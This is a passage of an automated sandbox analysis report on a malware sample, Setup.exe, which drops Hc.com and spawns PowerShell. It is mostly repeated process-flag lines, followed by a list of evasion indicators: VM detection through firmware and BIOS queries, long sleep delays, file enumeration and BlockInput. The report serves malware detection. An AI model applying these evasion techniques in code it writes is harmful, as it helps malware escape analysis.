            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8124Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1590Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2160
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1101
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comAPI coverage: 4.0 %
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com TID: 8168Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 8124 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 1590 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 2160 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3512Thread sleep count: 1101 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CDC54
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA087
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA1E2
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_002CE472
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_002DA570
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029C622 FindFirstFileExW,11_2_0029C622
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D66DC FindFirstFileW,FindNextFileW,FindClose,11_2_002D66DC
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D7333 FindFirstFileW,FindClose,11_2_002D7333
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002D73D4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CD921
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00265FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00265FC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: Hc.com, 0000000B.00000002.2324271859.0000000001A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DF4FF BlockInput,11_2_002DF4FF
